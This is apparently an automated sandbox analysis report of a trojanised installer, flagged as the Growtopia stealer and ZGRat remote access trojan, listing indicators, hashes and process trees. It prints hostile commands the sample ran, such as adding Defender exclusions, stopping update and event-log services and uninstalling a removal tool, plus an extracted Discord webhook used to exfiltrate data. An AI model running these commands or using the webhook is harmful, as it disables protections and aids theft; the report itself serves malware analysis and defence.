growtopia | f7ba1f62f5168638cbe3ccf0df5af38f68b55962ea3a639f6d0e2a464ab180a0

Analysis

max time kernel
32s
max time network
151s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
20-02-2024 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ValosploitV3_Installer/Installer.exe
Size

12.6MB
MD5

e560d8abab1b94fa698c5164b10c4fa5
SHA1

7b7e2334f06610ebcb9ac796c471961df6a6c377
SHA256

817cac7fcfdc0f48444c45be772997707761e2ca1e43e8d53f8f7e0e7a1e42b0
SHA512

cc546819fbf9cb40c8bd7c9f686b2d7e189b624fc94a8075e0a43ebcf83d28ed4fc51227c3450e94de91e2c72ce6ce68d7f5e6f8e9e390406da4bcc32470af16
SSDEEP

196608:MgINJY5ucj/+mDZR65PzwNVnQwOsayF0RjPLIp+I3U84IXrTNtNp0GIUOueu/ty:MR+59nYRzw0wlF0RjPLIECU84EJ49h

Score

10^/10

growtopia zgrat evasion persistence pyinstaller rat stealer

Malware Config

Extracted

Family

growtopia

https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj

Signatures

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral1/memory/576-71-0x0000000000650000-0x00000000006BC000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-72-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-73-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-77-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-81-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-79-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-83-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-75-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-87-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-85-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-89-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-91-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-93-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-99-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-101-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-97-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-95-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-103-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-111-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-113-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-109-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-107-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-105-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-155-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-153-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-157-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-169-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-167-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-176-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-174-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-171-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-164-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1
behavioral1/memory/576-151-0x0000000000650000-0x00000000006B5000-memory.dmp	family_zgrat_v1

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 1 IoCs

Processes:

Ilkdt.exe

pid process

576 Ilkdt.exe
Loads dropped DLL 3 IoCs

Processes:

Installer.exe

pid process

2880 Installer.exe
2880 Installer.exe
2880 Installer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

2 discord.com
3 discord.com
7 pastebin.com
8 pastebin.com

pid	process
576	Ilkdt.exe

pid	process
2880	Installer.exe
2880	Installer.exe
2880	Installer.exe

flow	ioc
2	discord.com
3	discord.com
7	pastebin.com
8	pastebin.com

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1608	sc.exe
2220	sc.exe
888	sc.exe
2356	sc.exe
2360	sc.exe
1716	sc.exe
3028	sc.exe
1632	sc.exe
2432	sc.exe
1524	sc.exe
2152	sc.exe
1088	sc.exe
2376	sc.exe
2348	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe	pyinstaller
\Users\Admin\AppData\Roaming\KeyGeneratorI.exe	pyinstaller
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe	pyinstaller
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2068 schtasks.exe

pid	process
2068	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2656 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

POWERPNT.EXE

pid process

2656 POWERPNT.EXE
2656 POWERPNT.EXE

pid	process
2656	POWERPNT.EXE

pid	process
2656	POWERPNT.EXE
2656	POWERPNT.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

POWERPNT.EXEInstaller.exe

description	pid	process	target process
PID 2656 wrote to memory of 2760	2656	POWERPNT.EXE	splwow64.exe
PID 2656 wrote to memory of 2760	2656	POWERPNT.EXE	splwow64.exe
PID 2656 wrote to memory of 2760	2656	POWERPNT.EXE	splwow64.exe
PID 2656 wrote to memory of 2760	2656	POWERPNT.EXE	splwow64.exe
PID 2880 wrote to memory of 2828	2880	Installer.exe	powershell.exe
PID 2880 wrote to memory of 2828	2880	Installer.exe	powershell.exe
PID 2880 wrote to memory of 2828	2880	Installer.exe	powershell.exe
PID 2880 wrote to memory of 2828	2880	Installer.exe	powershell.exe
PID 2880 wrote to memory of 576	2880	Installer.exe	Ilkdt.exe
PID 2880 wrote to memory of 576	2880	Installer.exe	Ilkdt.exe
PID 2880 wrote to memory of 576	2880	Installer.exe	Ilkdt.exe
PID 2880 wrote to memory of 576	2880	Installer.exe	Ilkdt.exe
PID 2880 wrote to memory of 568	2880	Installer.exe	WinHostMgr.exe
PID 2880 wrote to memory of 568	2880	Installer.exe	WinHostMgr.exe
PID 2880 wrote to memory of 568	2880	Installer.exe	WinHostMgr.exe
PID 2880 wrote to memory of 568	2880	Installer.exe	WinHostMgr.exe

C:\Users\Admin\AppData\Local\Temp\ValosploitV3_Installer\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\ValosploitV3_Installer\Installer.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="
  2⤵
  PID:2828
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  - Executes dropped EXE
  PID:576
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  PID:568
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:820
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:3028
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1632
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:2432
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1088
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1608
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:2220
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:1756
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:1640
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:296
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:2180
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:888
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2376
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:240
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  PID:684
- - C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe
    "C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp13DE.tmp" /F
      4⤵
      Creates scheduled task(s)
      PID:2068
- C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
  "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
  2⤵
  PID:1864
- - C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
    "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
    3⤵
    PID:2508
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  PID:2872

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\Desktop\ShowRevoke.pptm"
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2760

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
1⤵
PID:2704

C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
1⤵
PID:1572
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2348
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1136
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:1284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1712
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:1536
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:1080
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1524
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:240
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2360
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2152
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1684

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:1996

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:2148

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe

Filesize
292KB

MD5
6031179faaff951d17bf25ef5a9c971e

SHA1
06bac72833130a62f033e30a9abb8c33845fcd7e

SHA256
ea9077cd0cacc271933b45f9e0be542f76218f588eae30243308895e99227ab0

SHA512
21b20054aead4df10f69573ecba092e1577e649dd952eee6be675debf612c3d217a8c65974eb1c2d50427522549f95cd2263753d3d44c2ef8378135d8b60af0b

Download Submit
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe

Filesize
346KB

MD5
022b722487e358daeba086d516006819

SHA1
1faf3f77dfeae099e6ea43bcb15fc9fffd2ec282

SHA256
7eb287971e9c901e3b4ecb3d90001e72fb9c942913c79bf2c34fc15c3b16a876

SHA512
a1ab80d5d98e836d95491fa0830be0b358167ccc0bd4d8824449a9dc18089c30dd79eb52eabd6a62d379dac9964f46ce04bc3310378661679c78742e6b3f8cf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe

Filesize
316KB

MD5
675d9e9ab252981f2f919cf914d9681d

SHA1
7485f5c9da283475136df7fa8b62756efbb5dd17

SHA256
0f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d

SHA512
9dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
206KB

MD5
f3e10d413d9d08742d4a626e23e754af

SHA1
593f304cf60a3bbbe5ea185677403af57db2428d

SHA256
4a9d4dad88b2ef1f2f09e89e6bedb54bb0e9dc446053c6bfdbfa271308a5d6b1

SHA512
43a6c13a77698eb26b453625dfd3b67b9caab1352ef1ae2199a2dfcc1199e89a6515f83d9ef11d510a1675021deead420c58e94a828cf25234a0723525fc9c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
1.4MB

MD5
cebd644307cc86b68c2da6e670bfae8c

SHA1
3be8daf9f871cfe4eca2dccbb675dcef89c924fd

SHA256
dcaaf2f4b52eb771245d60e5f01b6ce99e12b20bd76c11491b3f3874fc6ce9c3

SHA512
37d5f12fa8c8f0edbb4d9c8fabef1475de1bf919807a0eed0640c69a4015434cc5757085209a008f166d66cc1da80506e11ee65329cfed07beaa5d0c86966cc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
1.5MB

MD5
40cfc5759e554a7ad710b56f4392997c

SHA1
0c6b93401ee4fa7ac6d61c8ba3a9a62c607e48d4

SHA256
2070daf188c23bce10718ccc4e08c9a8b0e55e21b5e70d51fb4225223309e03c

SHA512
04fb57663739ddfbb79f1ac380e66fedaaa0c84a58af32b7f4774f998a8016b0e6037c333b37b5de4efecb3edae3b03536053750c0a630120d8863db2fef0295

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18642\python312.dll

Filesize
64KB

MD5
f8441253c380bc6ad42693f646031072

SHA1
bdc63ff40ac290d019ebf15c075ee7f90213d107

SHA256
b66992fb27606a42952f05c32cb03a8a60772aebfce4715168277fc3ba33da55

SHA512
886cc5e5ba9a2e9df74ebed14791705f44f5eff7ec8a47ddd84f789f95f646acc03d4f9d484aa4a0ea7163e8ef38b6d5532c2b370e794253d9017b65aac3029f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp13DE.tmp

Filesize
1KB

MD5
7f673f709ab0e7278e38f0fd8e745cd4

SHA1
ac504108a274b7051e3b477bcd51c9d1a4a01c2c

SHA256
da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4

SHA512
e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132

Download Submit
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe

Filesize
905KB

MD5
208bb5c8a3c03a519cbd107a623a2c56

SHA1
39413102edb5f40620d09e35fcf0fd5c96104352

SHA256
eb3a39db6c5c70c15632abfdc635424ed7ebf3b921f7ad2edf430f323e348c01

SHA512
7e411c6c93daabb68b064fbc5215a9eac5cba17ffa9eaf47dd7ebf807a7e81f5a9a6656888f8c10abece001e4e362e2427777bb0c7cf8d54781b397470958356

Download Submit
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe

Filesize
253KB

MD5
f8236841af8706dbf4eb9e1083efe0bf

SHA1
e1568ae9d8283b6d42370b61ef5d42555ad99212

SHA256
f838d0fdf54dbae026edd971d1018eecf7af638ea2dd5c772e09c2db335cb7f6

SHA512
6905def0499d5168c2cee0b564406c935692914a4d902d9c5c70e40ea7fb4d5129eaf747fc93459e4620f944ebfe35ef7ac45ff30e12d3514010a237ed6087e0

Download Submit
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe

Filesize
45KB

MD5
633ec5b6e1ccc865132e75a989c62166

SHA1
1b35a9e626df0649ae40f9ef28c8302b4f13f946

SHA256
a587bb4d8351fda18c2b39c64d79abae3921da9b536e97ba5e5fedfa0804fdc0

SHA512
90f48c145cce3bc950f6255902a11d25a621170f38ac46b4a770c7f282fa704413b954bd4a1d7cfbe9966e389f15c52adc53e68d2fc063a9b25c795581a258ee

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMJ92QAP51S2K5Q63YH6.temp

Filesize
7KB

MD5
0a9ce9491dea9c5f6d3e9bc3c33a8e29

SHA1
392a556b2208c56fe8c6ece762c70fab923f9bd9

SHA256
1dc922b9f414811f5d2d6942f08f34de3f4b8cd03f7f56c1bd42b98d64de483e

SHA512
5fd81a25f3be80df64b8d118edad42989072220d78e736f4e5ce35302d37cc874a8e6980c7e507041f53513354fd83d7b2378bcb5edfe3ac10a5eff6aeb3eb7c

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe

Filesize
434KB

MD5
8de05713b8db83212e9c56a379759e15

SHA1
dcef303c85d635d0476bdfca9c85c79d8d9a94dd

SHA256
47adff2c461e8f577e6081ff0d8d9fb4aedb26e326c86342a7ba737de7a8e52c

SHA512
c6d0e2c55b589368291543f26971ed168a4e973d6dac69d5cb99f433a7c690e0a8c6b30b7dc58167e801b96e86b823e1311ed8c44d184f34d2a5d21040707bfb

Download Submit
\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe

Filesize
533KB

MD5
d101c9a5061f354e3274ee7b092e4891

SHA1
9138883dee559396d207fea2d222627bf21a3ea8

SHA256
2a17c6fd8ce530c0759044400e58b78d25e558c5f872f0201c7f73a1b27626ba

SHA512
006b41e66978a8f44c5ab7ba44e1b9a5a2b28c397bd258ba4829f0ec8bc192e415c4e9e8fab83e6ac01168697a8ce53262b7078ff579d3dfd85b10eddb4c4fd7

Download Submit
\Users\Admin\AppData\Local\Temp\Ilkdt.exe

Filesize
191KB

MD5
e004a568b841c74855f1a8a5d43096c7

SHA1
b90fd74593ae9b5a48cb165b6d7602507e1aeca4

SHA256
d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db

SHA512
402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af

Download Submit
\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe

Filesize
42KB

MD5
d499e979a50c958f1a67f0e2a28af43d

SHA1
1e5fa0824554c31f19ce01a51edb9bed86f67cf0

SHA256
bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e

SHA512
668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763

Download Submit
\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
1.7MB

MD5
df62543ffe1dbb7d61cd80ddc0f0a0ff

SHA1
084175d5f69f4fde23b5eb7046d960fcc7e8e351

SHA256
6632ef0f070af2a56276d3acfdc99fe303210a546904d8793774c10a05b01b96

SHA512
24e37715f1d365ec44a0350ce01ac5faf23088b7adf998213dfa2f9ff299365a5dc95d38d14a4ea93a99495a58c8d300281e4673c6d6b071ffea610c247f9b0b

Download Submit
\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
1.5MB

MD5
4c8d402e91045d56c545826accaceeb7

SHA1
51d9510648564032cace1f796dde5d92843b96b5

SHA256
706127ee60591f5a31922cd8e86d326e94c1b4cc7b32739eb66343e6f389fce5

SHA512
dbb9b0ff921560e16250822f236fb88fcf8e51b432420676b2a86a2233137ec4c1541ea71060c35e762ce2792013e3adf11e071a4eeac0d1c8718bc603ebfc59

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI18642\python312.dll

Filesize
96KB

MD5
0c39c5885827d561c7af0fd230680aba

SHA1
9e4133d5642f25a30bc3a27309971e2e6fa4599a

SHA256
6c9d5d376dd81e4cfd4f5393045c398755e20f46ba7f56ec9b8544152d973cb2

SHA512
fe0ad61f378b6826b6d5732d7e863bcf50ff5aca6afd4ea797e3491f70e5674fc7b52fc937570a7fdc86adbdd0cda2c8d154e1e3d50f539fe4a98eaba44a0e80

Download Submit
\Users\Admin\AppData\Roaming\KeyGeneratorI.exe

Filesize
798KB

MD5
bcc4641a74a37ae6da0e35c603c4b8f2

SHA1
0a518121d507a1374af81d124aed94dd54612e8f

SHA256
90235e4475ee9a34beb2d695c6b3cc768bd9f50039252b925973b1ef545b27a5

SHA512
8ad514c70d17cbe8262fbd0e182aefd65e3b3ef55e39471452c077f13c6fc2fb2f29cee231a66f5d0f701feb0ddf02067bb78f3ab0144f0b28eebb52c89b829d

Download Submit
memory/240-394-0x0000000000780000-0x00000000007A0000-memory.dmp

Filesize
128KB

Download
memory/240-396-0x0000000000780000-0x00000000007A0000-memory.dmp

Filesize
128KB

Download
memory/576-72-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-59-0x000000006B100000-0x000000006B7EE000-memory.dmp

Filesize
6.9MB

Download
memory/576-73-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-77-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-81-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-79-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-83-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-75-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-87-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-85-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-89-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-91-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-93-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-99-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
memory/576-101-0x0000000000650000-0x00000000006B5000-memory.dmp

Filesize
404KB

Download
